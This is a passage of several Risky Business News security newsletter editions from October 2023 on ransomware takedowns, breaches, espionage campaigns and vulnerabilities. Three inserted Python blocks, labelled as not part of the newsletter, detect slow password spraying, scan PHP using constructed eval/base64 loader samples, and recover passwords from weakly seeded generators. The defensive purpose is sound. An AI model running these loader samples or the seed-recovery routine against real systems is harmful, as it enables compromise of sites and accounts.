Philippines Army warns against AI use: Philippine officials have ordered defense and military personnel to refrain from using AI tools due to security risks. The US Space Force imposed a similar ban earlier this month. [Additional coverage in the Associated Press]

Philippines Cyber Command: The Philippine government is recruiting cyber personnel for its own Cyber Command-like structure inside its military forces. [Additional coverage in The Diplomat]

Brazil's New Resistance group: The US State Department has published a report on Nova Resistência, a Brazilian quasi-paramilitary neo-fascist organization formed by a pro-Kremlin disinformation and propaganda network.

"In addition to Nova Resistência's overt propaganda and disinformation in support of Russia's war against Ukraine, the organization has been involved in efforts to mobilize Brazilians to fight on the side of Russia and its proxies in the Donbas region of eastern Ukraine."

Russia formally linked to African online disinformation: A WaPo article describes how an employee at Israeli online influence company Percepto International infiltrated pro-Russian Facebook groups, became very active, and was invited to a meeting at the Russian embassy in Burkina Faso to establish a partnership, receive further training, and help promote anti-West views across the region. It's an eye-opening story on how Russia uses its diplomatic missions as part of its online disinformation efforts. Governments in five countries in Africa's Sahel region have been toppled in Russian-supported coups. [Additional coverage in the Washington Post/non-paywall]

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Resourcely CEO Travis McPeak about the modern DevOps ecosystem, how giving developers tools with security baked in keeps everyone safe and happy, and how that's easier than expecting your software engineers to become cybersecurity experts overnight.

Cybercrime and threat intel

RagnarLocker arrest: Europol officials have arrested a key member of the RagnarLocker ransomware group who was living in Paris, France. The arrest was announced after the gang's dark web leak site went offline last week. Five other suspects were interviewed in Spain and Latvia, and authorities seized servers in the Netherlands, Ukraine, Germany, and Sweden.

Ransomware suspects set free: A French judge has freed two Spanish nationals who had been accused of launching ransomware attacks against 26 French companies. Aged 26 and 28, the two suspects were detained in July of last year. French officials claimed the two used the Babuk ransomware to launch more than 200 attacks against companies all over the world. In a court hearing last week, lawyers for the two suspects argued there was reasonable doubt the two were behind the attacks. [Additional coverage in El Mundo / h/t PogoWasRight]

Warning for plastic surgery patients: Cybercriminals are targeting plastic surgery offices and hospitals to steal data and extort patients. The FBI says the attacks use phishing and social engineering to gain access to target networks, from where attackers harvest data from electronic health systems. The stolen data is then used to send threats to victims via email, social media, or messaging apps.

Ducktail+DarkGate campaign: WithSecure says it's seeing the Ducktail Vietnamese cybercrime group employ the latest DarkGate Malware-as-a-Service to help its operations.

QNAP takes down brute-forcer: Taiwanese electronics vendor QNAP says it took down a server that was being used by a threat actor to launch brute-force attacks against its NAS devices, looking for accounts protected with weak passwords. The attack took place on October 14, and QNAP says it blocked it within seven hours via its NAS firewall feature. It also worked with Digital Ocean to have the attacker's server shut down.

New npm malware: Ten malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Mastodon abuse: Stanford's Internet Observatory analyzes Mastodon's moderation model and how it could be abused for online propaganda.

New RDGA technique: Infoblox looks at RDGA (Registered Domain Generation Algorithm), an evolution of the classic DGA. So far, Infoblox has seen a Chinese APT using this technique.

"The main difference between this traditional use of a DGA and an RDGA is right there in the name: they're registered. With a standard DGA, the algorithm is incorporated in the malware itself and only a small percentage of the domains created by the algorithm are actually registered. [...] An RDGA, on the other hand, is used by the actor to create domains that will all be registered."

ENISA Threat Landscape: The EU's cybersecurity agency has published its yearly threat landscape report. Its main conclusions include a significant rise in social engineering attacks, infostealers becoming the biggest malware threat, a decline in classic mobile malware, and an increase in law enforcement operations.

Data breach statistics: The number of publicly disclosed data breaches will reach an all-time high this year, with the numbers for Q3 2022 already passing the previous record. More than 2,100 data breaches have been disclosed this year, way above the 1,862 peak recorded in 2021. According to researchers from the ID Theft Center, the record year can be attributed to the MOVEit hack, with 1,300 data breaches filed this year being related to the incident.

Malware technical reports

Dark Angels ransomware: SentinelOne analyzes the new Dark Angels ransomware, first spotted in September 2023. The security firm says the ransomware uses the leaked Babuk ransomware code for attacks on Windows systems and an ESXi encrypter that resembles the one used by the RagnarLocker group. The group operates a dark web leak site known as Dunghill Leaks.

"ESXi lockers continue to prove successful for the ransomware groups who use them, yet the overall pool of unique Linux ransomware families remains narrow. We assess with high confidence that these two samples are related and that the Linux version of Dark Angels is a very lightly modified, more recent version of the analyzed RagnarLocker binary.

Given the lack of security software on ESXi hypervisors, consider enhanced network monitoring for unusual access to these systems, including internal system traffic. When possible, focus on large or abnormal data transfers off of the ESXi server as well as other file storage services within the network."

7777-Botnet targets C-level execs: A botnet of more than 16,000 infected IoT devices has been launching slow-paced brute-forcing attacks against Microsoft Azure infrastructure. The attacks exclusively target the accounts of C-level executives. Each account is only targeted with two or three brute-force attempts per week and always from a different IP address. Security researchers have named it the 7777-Botnet and believe the attacker is trying to avoid detection by carrying out attacks at an extremely slow pace. Victims identified so far include two companies from the US energy sector, a UK government contractor, a UK university, and several companies in France.
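The pattern described above defeats per-IP and per-hour lockout rules by design. As an added example (not from the newsletter or the cited research), the check below aggregates failed sign-ins per account over a long window and flags accounts whose few failures come from many distinct source IPs. The log lines and their field layout are constructed for this example and do not follow a real Azure AD or Entra ID sign-in log schema.

```python
"""Detect slow, distributed password-guessing against high-value accounts.

Added example. Two or three failures per week from ever-changing IPs never
trip a per-IP rate limit, so the detection keys on the *account*: many
distinct source IPs failing against one account inside a long window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: timestamp, account, source IP, result.
# The first six lines mimic the slow spray; the rest are ordinary noise.
SAMPLE_LOG = """\
2023-09-04T03:12:09Z ceo@example.test 198.51.100.14 failure
2023-09-07T22:45:51Z ceo@example.test 203.0.113.77 failure
2023-09-11T04:02:33Z ceo@example.test 192.0.2.201 failure
2023-09-14T19:30:18Z ceo@example.test 198.51.100.90 failure
2023-09-18T01:15:40Z ceo@example.test 203.0.113.5 failure
2023-09-21T08:01:02Z ceo@example.test 192.0.2.44 failure
2023-09-05T09:00:00Z ceo@example.test 10.20.30.40 success
2023-09-05T09:01:10Z alice@example.test 10.20.30.41 failure
2023-09-05T09:01:15Z alice@example.test 10.20.30.41 failure
2023-09-05T09:01:30Z alice@example.test 10.20.30.41 success
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, account, ip, result)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, ip, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), account, ip, result))
    return events


def find_slow_sprays(events, window_days=30, min_failures=4, min_distinct_ips=3):
    """Return {account: (failures, distinct_ips)} for accounts whose failed
    sign-ins inside any window_days-long span come from at least
    min_distinct_ips different IPs.

    Thresholds are deliberately low: the whole point of the slow spray is to
    stay under conventional per-IP and per-hour lockout limits, so the
    signal is 'few failures, many IPs, one account' over weeks, not bursts.
    """
    failures = defaultdict(list)
    for ts, account, ip, result in events:
        if result == "failure":
            failures[account].append((ts, ip))

    flagged = {}
    window = timedelta(days=window_days)
    for account, items in failures.items():
        items.sort()                      # oldest first
        start = 0
        for end in range(len(items)):
            # Slide the window's left edge until the span fits in window_days.
            while items[end][0] - items[start][0] > window:
                start += 1
            span = items[start:end + 1]
            ips = {ip for _, ip in span}
            if len(span) >= min_failures and len(ips) >= min_distinct_ips:
                prev = flagged.get(account, (0, 0))
                if len(span) > prev[0]:   # keep the largest matching window
                    flagged[account] = (len(span), len(ips))
    return flagged


if __name__ == "__main__":
    for acct, (n_fail, n_ips) in find_slow_sprays(parse_log(SAMPLE_LOG)).items():
        print(f"{acct}: {n_fail} failures from {n_ips} distinct IPs in 30 days")
```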

WatchDog: Antiy researchers have published a breakdown of the WatchDog crypto-mining botnet.

IcedID: Walmart's security team looks at a recent IcedID campaign leveraging GitLab.

QuasarRAT: Uptycs researchers have published a report on the QuasarRAT and its DLL side-loading techniques, designed to drop, deploy, and execute malicious payloads without raising suspicions.

LummaStealer: VMware's Carbon Black security team looks at the LummaStealer Malware-as-a-Service (MaaS).

ExelaStealer: Fortinet researchers have analyzed ExelaStealer, a new infostealer that is currently being sold on underground dark web hacking forums.

Sponsor Demo

Listen to Resourcely CEO Travis McPeak talk with Risky Business Snake Oilers host Patrick Gray about the company's automagic Terraform cloud-provisioning technology.

APTs and cyber-espionage

CrimsonRAT: Security researchers have published an analysis of CrimsonRAT, a malware strain used by Pakistani cyber-espionage group APT36.

Vulnerabilities, security research, and bug bounty

ListServ vulnerabilities: Security firm Praetorian has identified several vulnerabilities in mailing list management app ListServ. The vulnerabilities can be used to compromise admin accounts and achieve remote code execution. All bugs remain unpatched after the vendor did not reply to Praetorian's vulnerability disclosure.

SonicWall hardcoded password: Security researchers at watchTowr Labs have found eight vulnerabilities in SonicWall SSL VPNs. All issues have now been fixed.

VMware security updates: VMware has released security updates for its Aria and Fusion products. Horizon3 has a write-up for one of the bugs here.

SolarWinds security updates: SolarWinds has released security updates for its Access Rights Management platform. The patches fix multiple bugs, including three 9.8/10 RCEs [1, 2, 3].

Amazon's passkeys: Identity provider Corbado is not a fan of Amazon's recent passkey implementation.

Three years to fix: The Harvest time-tracking app team took three years to fix a bug in their Azure app that was leaking its customers' OAuth tokens.

Zenbleed PoC: A PoC for the Zenbleed vulnerability that works in the Chrome browser has been released. The bug, disclosed in July, allows an attacker to retrieve secret material from AMD Zen 2 processors. Don't panic, though!

Atlassian zero-day PoC: A PoC for the recent Atlassian Confluence zero-day (CVE-2023-22515) has been added to the Metasploit framework after several exploit developers published PoCs online in the weeks prior. This is the Confluence 10/10 zero-day that was being exploited by a suspected Chinese cyber-espionage group.

HTTP/2 Rapid Reset attack: PortSwigger researchers have taken the concept behind the HTTP/2 Rapid Reset attack that was being used to launch DDoS attacks and applied it to perform remote race condition attacks with a single TCP packet. It's actually pretty nifty stuff!

Infosec industry

New tool—GraphRunner: Black Hills Information Security has open-sourced a tool named GraphRunner, a post-exploitation toolset for interacting with the Microsoft Graph API.

"It provides various tools for performing reconnaissance, persistence, and pillaging of data from a Microsoft Entra ID (Azure AD) account."

New tool—FalconHound: Security firm FalconForce has open-sourced FalconHound, a blue team multi-tool.

"It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool."

New tool—Delegate: Bell's Clément Cruchet has open-sourced Delegate, a tool to perform GCP domain-wide delegation abuse and access Workspace users' Drive and Gmail data from a compromised GCP service account.

New tool—WolfPack: RoseSecurity Research has open-sourced WolfPack, a tool that uses Terraform and Packer to streamline the deployment of red team redirectors on a large scale.

Chrome extension mapping: Security researcher Hexacorn has published a list that maps Chrome extension IDs with their real names. It is a useful file to have if you're conducting security research on malicious extensions. The file has more than 386,000 rows.

Hack.lu 2023 videos: Some of the talks from the Hack.lu 2023 security conference, which took place last week, are available on this YouTube channel.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss how changing circumstances change the risk/reward balance and change whether effects operations are worthwhile.

Risky Biz News: Two ransomware gang websites go puff!

20 October 2023 at 00:30

This newsletter is brought to you by application allow-listing software maker Airlock Digital. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.

Two ransomware gangs have had their dark web server infrastructure disrupted this week in two extremely different circumstances, with hacktivists wiping the servers of the Trigona gang and law enforcement seizing RagnarLocker's infrastructure a day later.

The first to fall was Trigona, a ransomware operation that began operations in June of last year.

In Facebook and Twitter posts, a group of pro-Ukrainian hacktivists named the Ukrainian Cyber Alliance said they hacked the backend servers supporting Trigona's operations.

The apparent intrusion began last week when one of the group's members breached Trigona's Atlassian Confluence server—go figure!

Once inside, the group says it made copies of Trigona's victim data, and then wiped their infrastructure clean. This included ten servers hosting the Trigona dark web leak site, RaaS backend, source code, internal chat rooms, and even Trigona's cryptocurrency wallets.

The Ukrainian Cyber Alliance didn't say how much money the wallets were holding, but they told The Record that they plan to share some of the Trigona data with security researchers.

One day after Trigona's demise, the website for the RagnarLocker gang also went down, with a takedown message listing the logos of the FBI, Europol, and more than a dozen European law enforcement agencies.

Contacted by TechCrunch, Europol confirmed the takedown but said they plan to reveal more details on Friday—a few hours after this newsletter goes live.

While we might not have all the details of this takedown in this edition, the action is extremely significant. The RagnarLocker group was one of the oldest ransomware gangs that were still active. It launched in early 2020, and most ransomware groups that launched around that time have long succumbed to in-fighting, rebrands, and law enforcement takedowns.

Even if RagnarLocker was not one of the most active ransomware groups today, it is still good news seeing it bite the dust regardless!

Breaches, hacks, and security incidents

CIA Twitter channel hack: A security researcher has exploited a Twitter bug to hijack a link shared by the CIA on its official account and redirect users seeking to access the CIA's Telegram informant channel to a channel of his own.

Hamas hijacks accounts of kidnapped victims: Hamas operators have used the smartphones of kidnapped Israelis to hijack their online accounts and spread propaganda and threats of violence. [Additional coverage in the New York Times/non-paywall]

Real Sociedad cyberattack: Spanish football club Real Sociedad is dealing with a cyberattack that has impacted some of its servers and databases.

certSIGN cyberattack: certSIGN, an official provider of e-signatures for the Romanian government and the private sector, has suffered a ransomware attack. The company restored service after a day.

23andMe leak: The hacker behind the 23andMe data breach has published online the personal information of 4.1 million of the site's users. The data is mostly for UK and German users. Known as Golem, the hacker previously leaked the data of 1 million Ashkenazi Jews. 23andMe confirmed the breach at the start of the month but downplayed its severity. [Additional coverage in TechCrunch]

Casio ClassPad breach: Japanese electronics giant Casio says that hackers breached its ClassPad educational platform and stole the personal data of registered users. The company confirmed the breach after hackers began advertising the ClassPad data on an underground hacking forum in September. Casio says the hacker stole the data of more than 91,000 customers across 149 countries.

CloudChat hack: A threat actor has compromised the website of the CloudChat instant messaging platform and modified the company's Windows installer to deliver malware. It's unclear for how long the backdoored installer was live, but security firm Sophos says it spotted the incident in August and notified the vendor. While it has not received a reply, Sophos says the app's website appears to have now been secured.

BigWhale crypto-heist: The BigWhale DeFi platform has lost $1.5 million worth of crypto-assets after one of its private keys leaked online. The company has promised to refund investors up to "the last cent."

Everscale crypto-heist: The Everscale cryptocurrency project has halted operations after a large number of its tokens were mysteriously stolen. The token's value dropped by 20%. The value of the theft remains unknown. [Additional coverage in Crypto News]

General tech and privacy

Twitter to charge new users: Twitter is moving forward with its plan to charge new users to post on the site. The company is currently running an experiment in New Zealand and the Philippines to see how the new system works and has plans to expand it globally. Twitter says it's taking this step as a way to fight bots. The site has been flooded with bots after Musk's takeover, going from the 300 million MAU it had for half a decade to more than 550 million MAU this year.

Hidden Brave VPN service: The Brave browser was caught installing a hidden VPN service on Windows systems, even if the browser user is not a customer of the company's VPN+firewall offering. [Additional coverage in gHacks]

Microsoft log retention: Starting with October 2023, the log retention period on Microsoft Purview accounts is now 180 days—instead of 90—for both standard and premium customers. Microsoft announced this change back in July after its systems were breached by Chinese hackers, and the lack of proper logs hindered IR investigations.

Google Play Protect update: Google has updated the Play Protect security feature on Android phones to perform real-time scans of suspicious apps.

"Google Play Protect will now recommend a real-time app scan when installing apps that have never been scanned before to help detect emerging threats. Scanning will extract important signals from the app and send them to the Play Protect backend infrastructure for a code-level evaluation. Once the real-time analysis is complete, users will get a result letting them know if the app looks safe to install or if the scan determined the app is potentially harmful."

Government, politics, and policy

Mandatory cyber insurance in Russia: The Russian government is considering introducing a new law that would require mandatory cyber insurance for all public and private companies. Discussions on the law began in June but have been moving slowly. The primary cause is the lack of cyber insurance providers across Russia. [Additional coverage in Kommersant]

Russia builds more internet walls: The Kremlin is working on a law to block access to online games unless they store servers inside Russia. The move comes after several pro-Ukraine and anti-Russian protests were staged inside some online games, such as Roblox and Counter-Strike. [Additional coverage in RBC]

Western companies in Russia: RecordedFuture looks at the dilemma facing Western companies that still have assets in Russia.

"Russia is aware of the corporate dilemma, where Western companies must decide whether to stay in Russia and risk potential targeting or leave and face asset loss but gain Western praise."

Phishing guidance: CISA, the NSA, and the FBI have published a report with guidance on how to stop the latest phishing techniques.

Five Eyes warn of Chinese IP theft: The heads of the Five Eyes intelligence-sharing alliance held their first-ever joint press conference to warn that China is engaging in a concerted campaign to steal cutting-edge intellectual property from democratic countries. Officials from Australia, Canada, New Zealand, the UK, and the US say the campaign ranges from online hacks to classic human intelligence operations where spies approach targets to spy on their behalf. UK officials say that in their country alone, spies have approached more than 20,000 people to spy on behalf of China. FBI Director Christopher Wray says China is primarily interested in technologies such as AI, robotics, biotech, and quantum computing.

Image via the FBI, from left to right: Australian Security Intelligence Organisation Director-General Mike Burgess, Canadian Security Intelligence Service Director David Vigneault, FBI Director Christopher Wray, New Zealand Security Intelligence Service Director-General of Security and Chief Executive Andrew Hampton, and MI5 Director General Ken McCallum

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Airlock Digital founders Daniel Schell and David Cottingham about the recent Microsoft Digital Defense Report and the problem of properly securing PowerShell.

Cybercrime and threat intel

E-Root admin arrested: US authorities have indicted a Moldovan national on crimes related to running E-Root, an online marketplace that sold access to hacked computers. Sandu Diaconu was detained in the UK in May 2021 and extradited and arraigned in a US court this week. Diaconu ran E-Root for years until the end of 2020, when the FBI seized the site. Officials say E-Root sold access to more than 350,000 computers across the world, with access being provided via RDP and SSH.

Tech CEO sentenced for IP address theft: US authorities have sentenced the CEO of Micfo LLC to five years in prison for defrauding the American Registry of Internet Numbers (ARIN). Amir Golestan, 40, of Charleston, pleaded guilty to tricking ARIN into granting his company more than 750,000 IPv4 addresses that he later sold on the black market for $3 million in profit. [Additional coverage in KrebsOnSecurity]

US seizes DPRK websites: The US government has seized 17 websites used by North Korean IT workers to disguise their identity and get hired by US companies. The group used the websites to pose as US-based software development companies in order to evade sanctions and pick up outsourcing contracts. The Justice Department says it also seized bank accounts holding $1.5 million in illicit funds generated by the group. Officials say that thousands of North Korean IT workers have been sent to live abroad, and they generate millions in US dollars every year for the regime, money that is used to fund North Korea's weapons program. The FBI has issued updated guidance on how to spot and report DPRK IT workers. [Additional coverage in TheDailyBeast]

Indian government cracks down on tech support scammers: The Indian government raided call centers in 76 locations across the country that engaged in tech support and cryptocurrency scams. Officials detained suspects and seized equipment and bank accounts across 11 Indian states. The operation, named Operation Chakra-II, was carried out by India's Central Bureau of Investigation with help from Microsoft and Amazon, whose services and customers were often targeted by the scammers.

Notepad++ and KeePass malvertising campaign: Malicious Google Ads promoting malware-infested versions of the Notepad++ editor and the KeePass password manager have been running rampant on the Google search engine for months.

Failed ransomware attack: Sophos looks at a failed ransomware attack in which a LockBit knock-off was deployed on a company's network via its Adobe ColdFusion server.

Default password research: Security firm Outpost24 has found that more than 1.8 million leaked admin accounts had been using insecure and easy-to-guess passwords. The most common password was "admin," which researchers found used for more than 40,000 admin accounts. Other common passwords such as "123456," "root," and "Password" also made the Top 20.

Office file formats: Intezer looks at all the different Microsoft Office file formats and how to deal with them during IR engagements.

Web malware evolution: Sucuri researchers explain how threat actors have evolved from using JS and PHP files to store malicious code to using non-executable file formats like LOG and TXT. The technique allows threat actors to avoid having their code spotted by security scanners but also load the content of the LOG or TXT files inside JS and PHP files at runtime without detection.
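Because the payload sits in a file type most scanners ignore, a useful check is to look for the loader instead: PHP that includes, or reads and then eval()s, a file with a non-code extension. The scanner below is an added example, not code from the newsletter or from Sucuri; the PHP snippets it runs on are constructed, and the extension list and function names are heuristics chosen for this example.

```python
"""Heuristic scanner for PHP that executes code parked in non-code files.

Added example. Rather than scanning .log/.txt files for code (the evasion the
item above describes), look in the .php files for the piece that has to be
there: an include/require of a non-code extension, or a file read on such a
file in a script that also calls eval()/assert()/create_function().
"""
import re

# Extensions a legitimate include/require almost never targets (heuristic list).
NON_CODE_EXT = r"\.(?:log|txt|ico|png|jpg|gif|css|dat)\b"

# include/require[_once] whose string argument ends in a non-code extension.
RE_INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[^;]*?['\"][^'\"]*" + NON_CODE_EXT + r"['\"]",
    re.IGNORECASE,
)
# A file read whose string argument ends in a non-code extension.
RE_READ = re.compile(
    r"\b(?:file_get_contents|file|fread|fopen|readfile)\s*\([^;]*?['\"][^'\"]*"
    + NON_CODE_EXT + r"['\"]",
    re.IGNORECASE,
)
# Dynamic code execution anywhere in the same file.
RE_EVAL = re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.IGNORECASE)


def scan_php(source):
    """Return a list of (line_no, reason) findings for one PHP source string."""
    findings = []
    has_eval = bool(RE_EVAL.search(source))
    for no, line in enumerate(source.splitlines(), 1):
        if RE_INCLUDE.search(line):
            findings.append((no, "include/require of non-code file"))
        elif has_eval and RE_READ.search(line):
            findings.append((no, "non-code file read in a script that also calls eval()"))
    return findings


# Constructed PHP samples: two loaders of the kind described, one benign file
# that reads a .txt but only echoes it (escaped), which must not be flagged.
SAMPLES = {
    "loader_include.php": (
        "<?php\n"
        "// constructed sample: payload parked in a 'log' under uploads\n"
        "include '/var/www/wp-content/uploads/debug.log';\n"
    ),
    "loader_eval.php": (
        "<?php\n"
        "$c = file_get_contents(__DIR__ . '/cache/x.txt');\n"
        "eval(base64_decode($c));\n"
    ),
    "benign.php": (
        "<?php\n"
        "require_once 'config.php';\n"
        "$notes = file_get_contents('readme.txt');\n"
        "echo htmlspecialchars($notes);\n"
    ),
}


def scan_all(samples):
    """Scan a {filename: source} mapping; returns {filename: findings}."""
    return {name: scan_php(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all(SAMPLES).items():
        for no, reason in findings:
            print(f"{name}:{no}: {reason}")
```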

LATAM threat landscape: As part of its talk at the VirusBulletin conference, ESET researchers have analyzed the threat landscape of Latin America, and the various cybercrime groups active in the region.

Malware technical reports

Qubitstrike: A threat actor named Qubitstrike is targeting internet-connected Jupyter Notebooks hosted in Google and AWS cloud infrastructure. The campaign targets Jupyter Notebooks with weak credentials. Once inside, the group deploys a rootkit, extracts cloud credentials from the compromised host, and moves to other cloud systems in order to mass-deploy a cryptominer. Cado Security researchers believe the threat actor may be based in Tunisia.

Munchkin: Palo Alto Networks has a report on Munchkin, a tool used by the BlackCat (AlphV) ransomware gang to move laterally across breached victim networks and push its file encryptor to as many machines as possible.

Sponsor Demo

Airlock Digital CEO David Cottingham shows Patrick Gray how Airlock's execution control and allowlisting solution works.

APTs and cyber-espionage

More WinRAR abuse: In our Monday (Oct 16) edition, we covered how several APT groups (APT28, Konni, DarkPink) were abusing a recently patched WinRAR zero-day (CVE-2023-38831) as part of their operations. Since then, Google TAG has also published a report highlighting the same thing. Besides APT28 (FROZENLAKE), Google says it also saw Russia's Sandworm (FROZENBARENTS) and a Chinese group named APT40 (ISLANDDREAMS) abusing the vulnerability.

Crambus: Iranian cyber-espionage group Crambus (APT34, OilRig, MuddyWater) has breached the network of a Middle Eastern government for eight months between February and September 2023. According to Broadcom's Symantec division, the group backdoored and exfiltrated data from 12 computers. They also installed a PowerShell backdoor named PowerExchange on the government's Exchange email server in order to intercept communications in real time.

Hamas-Iran overlap: Recorded Future analysts have found server infrastructure overlaps between apps linked to the Hamas terrorist organization, Palestinian cyber-espionage group TAG-63 (AridViper), and Iran's Quds Force.

DPRK's TeamCity exploitation: Two North Korean hacking groups named Diamond Sleet and Onyx Sleet are exploiting a vulnerability in JetBrains TeamCity CI/CD servers to gain access and deploy backdoors and remote access trojans across enterprise networks. Tracked as CVE-2023-42793, the vulnerability was patched in late September, and attacks began at the start of October after proof-of-concept code was published online. Several ransomware groups have been spotted leveraging the vulnerability for initial access. Roughly 1,200 TeamCity servers are currently reachable online.

DPRK uses AI for malware: Deputy National Security Advisor Anne Neuberger says that North Korea is experimenting with using AI to write malicious code and find new systems to exploit. Other nation-state actors are also using AI, but Neuberger did not provide any other details. The exact quote is below. [Additional coverage in VentureBeat]

"So we have observed some North Korean and other nation-state and criminal actors try to use AI models to help accelerate writing malicious software and finding systems to exploit."

MATA campaign: Cyber-spies have targeted oil companies and defense contractors across Eastern Europe in what looks to be a suspected North Korean operation. The attacks took place between August 2022 and May 2023 and used an updated version of the powerful MATA malware framework. Discovered by Kaspersky, the company says the framework included both Windows and Linux malware, stealers, EDR bypassing tools, and even a USB worm to collect data from air-gapped networks. Kaspersky researchers have not formally attributed the attacks but noted the MATA code contains similarities to malware previously used by North Korean and Five Eyes APT groups. An analysis of malware compilation times seems to point the finger at a group based in Korean, Chinese, and Vietnamese time zones. While Kaspersky did not name the group, it appears this is what PT Security has previously named Dark River.

Vulnerabilities, security research, and bug bounty

Secret Citrix zero-day: Google's Mandiant division says that a recently patched Citrix vulnerability has been exploited in the wild since the end of August. Tracked as CVE-2023-4966, the vulnerability impacts ADC and NetScaler devices and was patched on October 10. Mandiant says the zero-day can allow attackers to hijack existing user sessions and bypass authentication requirements. The company is now warning owners of Citrix ADC and NetScaler devices to install the recent patch and invalidate all existing user sessions to prevent threat actors from abusing old sessions.

More info on the Adobe Reader zero-day: North Korean hackers have exploited an Adobe Reader zero-day (CVE-2023-26369) in a social engineering campaign that targeted security researchers this year. The Adobe Reader zero-day is the unnamed zero-day that Google mentioned in a blog post in September. North Korean hackers have been targeting security researchers for the past two years in an attempt to steal exploits and research on unpublished vulnerabilities. The recent campaign stood out because, besides GitHub and Twitter, North Korea also contacted security researchers active on the Mastodon network. Besides the recent Adobe Reader zero-day, in the past, North Korean hackers also used an Internet Explorer zero-day to compromise the PCs of security researchers.

Synology NAS bugs: Claroty researchers have discovered that Synology NAS devices are using a weak RNG algorithm that can allow threat actors to reconstruct the admin account password and take over the device. Tracked as CVE-2023-2729, the issue was fixed in June.
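To illustrate why a weak RNG turns into a password problem, here is an added example that is not Claroty's finding or Synology's code: a hypothetical generator seeded from a Unix timestamp beside one backed by the OS CSPRNG, plus an audit function a defender can point at their own generator to check whether a password is reproducible from a small assumed seed space. The function names, the alphabet, and the one-hour window are constructed.

```python
import random
import secrets
import string

# Constructed illustration (not vendor code): password generation with a
# low-entropy seed versus the OS CSPRNG, and an audit that tells them apart.
ALPHABET = string.ascii_letters + string.digits


def weak_password(seed: int, length: int = 12) -> str:
    """Deterministic: the same seed (e.g. a boot or install timestamp) always
    yields the same password, so the password has no more entropy than the seed."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def strong_password(length: int = 12) -> str:
    """Each character drawn from the OS CSPRNG; not reproducible from any seed."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def seed_space_audit(password: str, candidate_seeds, generator=weak_password):
    """Defender's check: if any seed in the assumed candidate space reproduces
    the password, the generator is unfit for secrets. Returns the matching seed
    or None."""
    for seed in candidate_seeds:
        if generator(seed, len(password)) == password:
            return seed
    return None


if __name__ == "__main__":
    install_time = 1_700_000_000  # constructed timestamp
    window = range(install_time - 3600, install_time + 3600)
    weak = weak_password(install_time)
    strong = strong_password()
    print("weak generator reproducible from seed:", seed_space_audit(weak, window))
    print("strong generator reproducible from seed:", seed_space_audit(strong, window))
```

The audit deliberately uses a small window: a generator that fails it with a few thousand candidate seeds has no business producing admin passwords, and a generator that draws from `secrets` cannot fail it for any window at all.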

Oracle CPU: The quarterly Oracle security updates are out, with patches for 387 vulnerabilities.

Caliptra security audit: NCC Group has conducted a security audit of Caliptra, a firmware solution for implementing Root of Trust on datacenter-class SoCs. The security audit was contracted by Microsoft and found 26 vulnerabilities, all fixed now.

Cisco IOS XE carnage: The number of Cisco routers and switches backdoored via the recent IOS XE zero-day (CVE-2023-20198) has now almost reached 42,000. More in this GreyNoise analysis.

Infosec industry

New tool—Security Insights Specification: The Open Source Security Foundation (OpenSSF) has released the final version of the Security Insights Specification, a specification that provides a mechanism for projects to report information about their security in a machine-processable way.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss how changing circumstances change the risk/reward balance and change whether effects operations are worthwhile.

Risky Biz News: Mysterious APT compromises Asian government's secure USBs

18 October 2023 at 00:30

This newsletter is brought to you by application allow-listing software maker Airlock Digital. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A mysterious APT group has compromised secure USB drives used by an Asian country's government to safely store and physically transfer data between sensitive government systems.

Spotted by Kaspersky, the attacks took place in early 2023. While the security firm has not attributed the operation to any particular APT group or state, the campaign is extremely likely to be Chinese in origin. Chinese APT groups—such as Camaro Dragon, Temp.Hex, UNC4191, Mustang Panda, and Tropic Trooper—have used USB drives as a way to distribute malware across the APAC region for the past several years, and some of these campaigns have been recently seen in Africa and Europe as well.

But while previous campaigns targeted your run-of-the-mill USB thumb drives, Kaspersky says this campaign targeted "a specific type of a secure USB drive" used by that country's government agencies.

Secure USB drives are also known as encrypted USBs and are typically used to store sensitive information in a separate partition. Everything on this partition is encrypted. The USB uses software stored in an unencrypted part of the USB device along with a user password to access the encrypted data.

Such devices are typically used by companies and government agencies to store extremely sensitive data and then physically transfer the USB drive to a secure location and plug it into an air-gapped network.

Kaspersky says the APT group crafted malware that would hide in the secure USB's software, working as a worm and loading itself on all computers the secure USB would be plugged into. A more technical explanation is below:

"The attack comprises sophisticated tools and techniques, including virtualization-based software obfuscation for malware components, low-level communication with the USB drive using direct SCSI commands, self-replication through connected secure USB drives to propagate to other air-gapped systems and injection of code into a legitimate access management program on the USB drive which acts as a loader for the malware on a new machine."

Attacks so far have been "extremely targeted," and Kaspersky says the APT made only a "limited number of victims." Which is extremely good for an intelligence collection operation targeting air-gapped systems. Not good is the part about getting caught.

Updated on October 19 to add that Kaspersky has named this APT as TetrisPhantom and plans to provide more details about the group at its upcoming SAS security conference.


Breaches, hacks, and security incidents

BlackHole crypto-heist: Hackers have stolen $1.2 million worth of funds from the BlackHole cryptocurrency project after they exploited a vulnerability in the token's smart contract.

Guatemala hacktivism: Hackers associated with the Anonymous collective have launched DDOS attacks against Guatemalan government websites. The hackers said their attacks are in support of the country's pro-democracy protests. Public rallies have been taking place in Guatemala since August, when the country's president challenged the results of the recent elections and delayed the new president from taking office. [Additional coverage in the Associated Press]

Belgian govt DDOS attacks: Belgium's cybersecurity agency says several government websites were taken offline last Thursday following a series of DDOS attacks. Affected websites included the website of the Royal Palace, the Chancellery of the Prime Minister, and the Senate.

